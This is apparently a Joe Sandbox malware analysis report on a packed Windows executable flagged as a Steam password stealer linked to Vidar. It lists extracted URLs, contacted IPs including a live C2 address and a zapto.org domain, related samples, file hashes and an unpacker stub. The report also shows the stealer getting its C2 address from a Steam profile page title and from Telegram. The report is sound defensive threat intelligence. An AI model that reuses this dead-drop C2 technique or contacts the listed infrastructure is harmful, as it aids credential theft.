          https://store.steampowered.com/stats/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://medal.tvSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://broadcast.st.dl.eccdnx.comSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://store.steampowered.com/steam_refunds/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://store.steampowered.com/privacy_agreemenSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://188.245.87.202/cSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FA5000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://steamcommunity.com/workshop/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://login.steampowered.com/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://store.steampowered.com/legal/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://64532127VdtSrezylanAPTHSymMatchStringInternetSetOptionAHttpQueryInfoAdbghelp.dllSetThreadContSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=eSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • URL Reputation: safe
          		unknown
          https://api.steampowerSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002F76000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://recaptcha.netSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://store.steampowered.com/76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gifSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://127.0.0.1:27060SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://arpdabl.zapto.org/DSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FA5000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          		unknown
          https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLhSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://steamcommunity.com/profiles/76561199747278259$SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002F76000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          188.245.87.202
          		unknownIran (ISLAMIC Republic Of)
          		16322PARSONLINETehran-IRANIRfalse
          23.50.98.133
          		steamcommunity.comUnited States
          		16625AKAMAI-ASUStrue
          149.154.167.99
          		t.meUnited Kingdom
          		62041TELEGRAMRUfalse

          General Information

          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1511546
          Start date and time:2024-09-15 18:28:30 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 5m 10s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:8
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe
          Detection:MAL
          Classification:mal100.troj.spyw.evad.winEXE@6/1@3/3
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 98%
          • Number of executed functions: 41
          • Number of non-executed functions: 75
          Cookbook Comments:
          • Found application associated with file extension: .exe

          Warnings

          • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, svchost.exe
          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.

          Simulations

          Behavior and APIs

          TimeTypeDescription
          12:30:06API Interceptor1x Sleep call for process: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe modified

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          188.245.87.202SecuriteInfo.com.Trojan.PWS.Steam.37481.30383.28482.exeGet hashmaliciousVidarBrowse
            file.exeGet hashmaliciousVidarBrowse
              FE89Nae47k.exeGet hashmaliciousVidarBrowse
                66b0ba4420669_main.exeGet hashmaliciousVidarBrowse
                  66b09f01e0030_dozkey.exeGet hashmaliciousVidarBrowse
                    lem.exeGet hashmaliciousVidarBrowse
                      23.50.98.133SecuriteInfo.com.Win32.Evo-gen.25283.30900.exeGet hashmaliciousLummaCBrowse
                        SecuriteInfo.com.FileRepMalware.25501.25264.exeGet hashmaliciousLummaCBrowse
                          SecuriteInfo.com.W32.PossibleThreat.3672.22783.exeGet hashmaliciousLummaCBrowse
                            SecuriteInfo.com.Win32.Malware-gen.17837.3001.exeGet hashmaliciousLummaCBrowse
                              SecuriteInfo.com.Trojan.PWS.Steam.37481.30383.28482.exeGet hashmaliciousVidarBrowse
                                SecuriteInfo.com.Win32.Malware-gen.17837.3001.exeGet hashmaliciousLummaCBrowse
                                  Setup.exeGet hashmaliciousLummaCBrowse
                                    149.154.167.99http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                    • telegram.org/
                                    http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                    • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                    http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                    • telegram.org/
                                    http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                    • telegram.org/
                                    http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                    • telegram.org/?setln=pl
                                    http://makkko.kz/Get hashmaliciousUnknownBrowse
                                    • telegram.org/
                                    http://telegram.dogGet hashmaliciousUnknownBrowse
                                    • telegram.dog/
                                    LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                    • t.me/cinoshibot
                                    jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                    • t.me/cinoshibot
                                    vSlVoTPrmP.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                    • t.me/cinoshibot

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    t.meSecuriteInfo.com.Trojan.PWS.Steam.37481.30383.28482.exeGet hashmaliciousVidarBrowse
                                    • 149.154.167.99
                                    SecuriteInfo.com.Trojan.DownLoader47.29560.25432.19798.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 149.154.167.99
                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 149.154.167.99
                                    IM5Ov6yzm3CzKUodDTWqZSXo.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 149.154.167.99
                                    aNj1aFSOxohqZwe847hVpx4K.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 149.154.167.99
                                    https://bdh.vcj.mybluehost.me/website_8e3e3126/wp-admin/ANTIA/3dsece.phpGet hashmaliciousUnknownBrowse
                                    • 162.241.217.207
                                    https://bdh.vcj.mybluehost.me/website_8e3e3126/wp-admin/ANTIA/3dsec.phpGet hashmaliciousUnknownBrowse
                                    • 162.241.217.207
                                    https://bdh.vcj.mybluehost.me/website_8e3e3126/wp-admin/ANTIA/paiement.phpGet hashmaliciousUnknownBrowse
                                    • 162.241.217.207
                                    sntmr.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 149.154.167.99
                                    vfdjg.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 149.154.167.99
                                    steamcommunity.comSecuriteInfo.com.Trojan.PWS.Steam.37582.19133.23112.exeGet hashmaliciousVidarBrowse
                                    • 23.204.10.89
                                    SecuriteInfo.com.W32.PossibleThreat.3672.22783.exeGet hashmaliciousLummaCBrowse
                                    • 23.197.127.21
                                    SecuriteInfo.com.Win32.Evo-gen.25283.30900.exeGet hashmaliciousLummaCBrowse
                                    • 23.50.98.133
                                    SecuriteInfo.com.FileRepMalware.25501.25264.exeGet hashmaliciousLummaCBrowse
                                    • 23.50.98.133
                                    SecuriteInfo.com.Win32.Evo-gen.16486.13246.exeGet hashmaliciousLummaCBrowse
                                    • 23.197.127.21
                                    SecuriteInfo.com.W32.PossibleThreat.3672.22783.exeGet hashmaliciousLummaCBrowse
                                    • 23.50.98.133
                                    SecuriteInfo.com.Win32.Malware-gen.17837.3001.exeGet hashmaliciousLummaCBrowse
                                    • 23.50.98.133
                                    SecuriteInfo.com.Trojan.PWS.Lumma.400.14864.1823.exeGet hashmaliciousLummaCBrowse
                                    • 23.197.127.21
                                    SecuriteInfo.com.Trojan.PWS.Steam.37481.30383.28482.exeGet hashmaliciousVidarBrowse
                                    • 23.50.98.133
                                    SecuriteInfo.com.FileRepMalware.25501.25264.exeGet hashmaliciousLummaCBrowse
                                    • 23.197.127.21
                                    arpdabl.zapto.orgSecuriteInfo.com.Trojan.PWS.Steam.37481.30383.28482.exeGet hashmaliciousVidarBrowse
                                    • 0.0.0.0
                                    FortiClientOnlineInstaller.exeGet hashmaliciousVidarBrowse
                                    • 0.0.0.0
                                    qDqcWUzhA7.exeGet hashmaliciousVidarBrowse
                                    • 0.0.0.0
                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 0.0.0.0
                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                    • 0.0.0.0
                                    file.exeGet hashmaliciousAmadey, VidarBrowse
                                    • 0.0.0.0
                                    a96b3ddd991bc4a88831685ef44cbd4ad7945a4afc3a028f42812f269d513674_payload.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 0.0.0.0
                                    66bddfc358668_stealc.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 0.0.0.0
                                    66bddfcb52736_vidar.exeGet hashmaliciousLummaC, VidarBrowse
                                    • 0.0.0.0
                                    dXaIbmbdKj.exeGet hashmaliciousVidarBrowse
                                    • 0.0.0.0

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    TELEGRAMRUSecuriteInfo.com.Trojan.PWS.Steam.37481.30383.28482.exeGet hashmaliciousVidarBrowse
                                    • 149.154.167.99
                                    SecuriteInfo.com.Trojan.DownLoader47.29560.25432.19798.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 149.154.167.99
                                    SecuriteInfo.com.FileRepMalware.32268.950.exeGet hashmaliciousUnknownBrowse
                                    • 149.154.167.99
                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 149.154.167.99
                                    SecuriteInfo.com.FileRepMalware.32268.950.exeGet hashmaliciousUnknownBrowse
                                    • 149.154.167.92
                                    ATH0000878718.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • 149.154.167.220
                                    IM5Ov6yzm3CzKUodDTWqZSXo.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 149.154.167.99
                                    aNj1aFSOxohqZwe847hVpx4K.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 149.154.167.99
                                    PjkFCWhi.exeGet hashmaliciousXWormBrowse
                                    • 149.154.167.220
                                    https://lkjkqklqsd.vercel.app/Get hashmaliciousUnknownBrowse
                                    • 149.154.167.220
                                    PARSONLINETehran-IRANIRSecuriteInfo.com.Trojan.PWS.Steam.37481.30383.28482.exeGet hashmaliciousVidarBrowse
                                    • 188.245.87.202
                                    https://www.soap2dayofficial.club/tgsfeGet hashmaliciousPhisherBrowse
                                    • 5.78.24.153
                                    PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).batGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                    • 5.78.41.174
                                    SecuriteInfo.com.Exploit.CVE-2017-11882.123.29807.9267.rtfGet hashmaliciousFormBookBrowse
                                    • 5.78.41.174
                                    x86.elfGet hashmaliciousMiraiBrowse
                                    • 178.169.26.221
                                    file.exeGet hashmaliciousVidarBrowse
                                    • 188.245.87.202
                                    FE89Nae47k.exeGet hashmaliciousVidarBrowse
                                    • 188.245.87.202
                                    66b0ba4420669_main.exeGet hashmaliciousVidarBrowse
                                    • 188.245.87.202
                                    66b09f01e0030_dozkey.exeGet hashmaliciousVidarBrowse
                                    • 188.245.87.202
                                    lem.exeGet hashmaliciousVidarBrowse
                                    • 188.245.87.202
                                    AKAMAI-ASUSSecuriteInfo.com.Trojan.PWS.Steam.37582.19133.23112.exeGet hashmaliciousVidarBrowse
                                    • 23.204.10.89
                                    SecuriteInfo.com.Win32.Evo-gen.25283.30900.exeGet hashmaliciousLummaCBrowse
                                    • 23.50.98.133
                                    SecuriteInfo.com.FileRepMalware.25501.25264.exeGet hashmaliciousLummaCBrowse
                                    • 23.50.98.133
                                    SecuriteInfo.com.W32.PossibleThreat.3672.22783.exeGet hashmaliciousLummaCBrowse
                                    • 23.50.98.133
                                    SecuriteInfo.com.Win32.Malware-gen.17837.3001.exeGet hashmaliciousLummaCBrowse
                                    • 23.50.98.133
                                    SecuriteInfo.com.Trojan.PWS.Steam.37481.30383.28482.exeGet hashmaliciousVidarBrowse
                                    • 23.50.98.133
                                    SecuriteInfo.com.Win32.Malware-gen.17837.3001.exeGet hashmaliciousLummaCBrowse
                                    • 23.50.98.133
                                    SecuriteInfo.com.Trojan.DownLoader47.29560.25432.19798.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 92.122.63.136
                                    http://thenonphonewfhnetwork.com/.rice/Get hashmaliciousUnknownBrowse
                                    • 2.19.68.136
                                    IM5Ov6yzm3CzKUodDTWqZSXo.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 23.192.247.89

                                    JA3 Fingerprints

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    37f463bf4616ecd445d4a1937da06e19SecuriteInfo.com.Trojan.PWS.Steam.37582.19133.23112.exeGet hashmaliciousVidarBrowse
                                    • 23.50.98.133
                                    • 149.154.167.99
                                    SecuriteInfo.com.Trojan.PWS.Steam.37481.30383.28482.exeGet hashmaliciousVidarBrowse
                                    • 23.50.98.133
                                    • 149.154.167.99
                                    SecuriteInfo.com.Win64.Malware-gen.12732.27825.exeGet hashmaliciousLatrodectusBrowse
                                    • 23.50.98.133
                                    • 149.154.167.99
                                    SecuriteInfo.com.Trojan.DownLoader47.29560.25432.19798.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 23.50.98.133
                                    • 149.154.167.99
                                    file.exeGet hashmaliciousClipboard Hijacker, Raccoon Stealer v2Browse
                                    • 23.50.98.133
                                    • 149.154.167.99
                                    SecuriteInfo.com.FileRepMalware.32268.950.exeGet hashmaliciousUnknownBrowse
                                    • 23.50.98.133
                                    • 149.154.167.99
                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 23.50.98.133
                                    • 149.154.167.99
                                    SecuriteInfo.com.FileRepMalware.32268.950.exeGet hashmaliciousUnknownBrowse
                                    • 23.50.98.133
                                    • 149.154.167.99
                                    file.exeGet hashmaliciousClipboard Hijacker, Raccoon Stealer v2Browse
                                    • 23.50.98.133
                                    • 149.154.167.99
                                    IM5Ov6yzm3CzKUodDTWqZSXo.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 23.50.98.133
                                    • 149.154.167.99

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZRZDXR93\76561199747278259[1].htm

                                    Download File
                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe
                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
                                    Category:dropped
                                    Size (bytes):34740
                                    Entropy (8bit):5.401683938260732
                                    Encrypted:false
                                    SSDEEP:768:ldpqme0Ih3tAA6WGFOfcDAJTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2S+:ld8me0Ih3tAA6WGFOFJTBv++nIjBtPFP
                                    MD5:7783A3E7F18C8F1F12175D86EEF33652
                                    SHA1:3E285D8EFB7C74F335FC75F89B80548576DE82B7
                                    SHA-256:2631722BD721985597B5BA16FC6F037CB19E414B0B5F273855653CB868ABB32F
                                    SHA-512:2CD70E638D58A63EA7B2691B4A1D7F9E42D33791A44D6D5AE73B19B6A8F356E9271D2872C5BEA14AF1112BDE876CF8A07142210AA8833AD63FF84A02ACA16C67
                                    Malicious:false
                                    Reputation:low
                                    Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: gi_z2 https://188.245.87.202|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=QI-9YLc_mdtk&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link h

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                    Entropy (8bit):7.936498076181626
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.66%
                                    • UPX compressed Win32 Executable (30571/9) 0.30%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe
                                    File size:70'144 bytes
                                    MD5:5a4ccccb90b0aaa3b248d4f0dde38823
                                    SHA1:be8f1d791a81696cd58e7f837a97aaea58eeb26a
                                    SHA256:b802eb0f4a10d4aecc9015ee86ddc9b1249212dcabc2ecb6aa97418d0de7722b
                                    SHA512:a75db1a19a6bc4f5a9c5437864cb01e5d139ef56365e3d320035fcfa65a713886f78a6fe2f3eb130e35bed1a25e4fe73d712b6e03ed6bb373e73a6c3a3cb7737
                                    SSDEEP:1536:T7os4AvSdEcNj56sWOr3H8+wMiT8om0QSnouy8:TBvSdEcHWswxQJ0Zout
                                    TLSH:A3630205C4330796DEEF14FD111F6B2E28369E5CC6A46D35EB2031B1E8B9FB6164C895
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M..!..`r..`r..`rf..r..`rf..r2.`r...r..`r...r..`r..as..`r..ar..`rf..r!.`rf..r..`rRich..`r................PE..L...kQ.f...........

                                    File Icon

                                    Icon Hash:00928e8e8686b000

                                    Static PE Info

                                    General

                                    Entrypoint:0x645d70
                                    Entrypoint Section:UPX1
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x66AA516B [Wed Jul 31 14:59:55 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:1
                                    File Version Major:5
                                    File Version Minor:1
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:1
                                    Import Hash:6d1ea1a7f4738511b305583a93ec33ea

                                    Entrypoint Preview

                                    Instruction
                                    pushad
                                    mov esi, 00636000h
                                    lea edi, dword ptr [esi-00235000h]
                                    push edi
                                    mov ebp, esp
                                    lea ebx, dword ptr [esp-00003E80h]
                                    xor eax, eax
                                    push eax
                                    cmp esp, ebx
                                    jne 00007F8E94C1239Dh
                                    inc esi
                                    inc esi
                                    push ebx
                                    push 002439EAh
                                    push edi
                                    add ebx, 04h
                                    push ebx
                                    push 0000FD5Fh
                                    push esi
                                    add ebx, 04h
                                    push ebx
                                    push eax
                                    mov dword ptr [ebx], 00020003h
                                    push ebp
                                    push edi
                                    push esi
                                    push ebx
                                    sub esp, 7Ch
                                    mov edx, dword ptr [esp+00000090h]
                                    mov dword ptr [esp+74h], 00000000h
                                    mov byte ptr [esp+73h], 00000000h
                                    mov ebp, dword ptr [esp+0000009Ch]
                                    lea eax, dword ptr [edx+04h]
                                    mov dword ptr [esp+78h], eax
                                    mov eax, 00000001h
                                    movzx ecx, byte ptr [edx+02h]
                                    mov ebx, eax
                                    shl ebx, cl
                                    mov ecx, ebx
                                    dec ecx
                                    mov dword ptr [esp+6Ch], ecx
                                    movzx ecx, byte ptr [edx+01h]
                                    shl eax, cl
                                    dec eax
                                    mov dword ptr [esp+68h], eax
                                    mov eax, dword ptr [esp+000000A8h]
